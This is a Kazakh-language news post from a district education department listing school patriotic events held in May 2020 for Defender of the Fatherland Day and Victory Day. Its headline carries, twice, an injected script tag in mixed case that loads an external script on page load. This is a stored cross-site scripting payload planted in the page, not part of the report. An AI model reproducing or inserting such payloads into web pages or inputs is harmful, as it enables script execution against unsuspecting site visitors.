Отан қорғаушылар күні мен Жеңіс Күнін мерекелеу бойынша білім беру ұйымдарында өткізілетін іс-шаралар туралы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.05.2020

 

Ақкөл аудандық білім бөлімі оқушылардың әлеуметтік маңызды құндылықтарын, азаматтық пен патриотизмді тәрбиелеу, өз еліне деген мақтаныш сезімін қалыптастыру мақсатында Отан қорғаушылар күні мен Жеңіс Күнін мерекелеу бойынша іс-шаралар жоспарын жасады.

Қашықтық іс-шараларды өткізу кезінде сынып жетекшілері оқушылардың назарын мерекенің пайда болу тарихына, оның ұлттық маңыздылығына және мемлекет тарихында және қазақстандық қоғамның қазіргі өмірінде шоғырландырушы рөліне  назар аударды.

"Ұлы Жеңіс – біздің ұлы мұра"атты шығармалар байқауы өтті. Ең үздік шығармалар Жеңіс күніне арналған облыстық қашықтық байқауға қатысуға жіберілді.

Оқушылар өлеңдер, шығармалар, суреттер мәнерлеп оқу байқауларына белсенді қатысты:

- "Соғыстың жас батырлары"

- "Менің ауылым ардагерлері" атты презентация

- "Соғыс жылдары " сынып сағаты

- "Ұлы Отан соғысы тарихы" зияткерлік Халықаралық қашықтық олимпиадасы

- "Жеңіс үшін Атаға рахмет" халықаралық қашықтық шығармалар байқауы

-Халықаралық өлеңдерді жатқа айту байқауы

- "Желбіре, Жеңіс туы" облыстық сырттай бейнероликтер байқауы

- "Бұл Жеңіс күні" Халықаралық қашықтық шығармалар байқауы

- Отан қорғаушылар күніне арналған "Ұлы Дала Батырлары" атты кітапханалық онлайн-кітап көрмесі.

-Ұлы Отан соғысына арналған мұғалімдер арасындағы Халықаралық қашықтық олимпиада.

5-11 сыныптарда "Ешкім де, ештеңе де ұмытылмайды"сынып сағаттары өткізілді.

Сынып жетекшілері әр түрлі іс-шараларды (викториналар, блиц - сауалнамалар, презентациялар, бейнероликтер) қолданды.

 

Білім бөлімінің әдіскері С.Мимбаева

Просмотров: 895


Пікір қосу



Деректерді қолтаңбаға қосу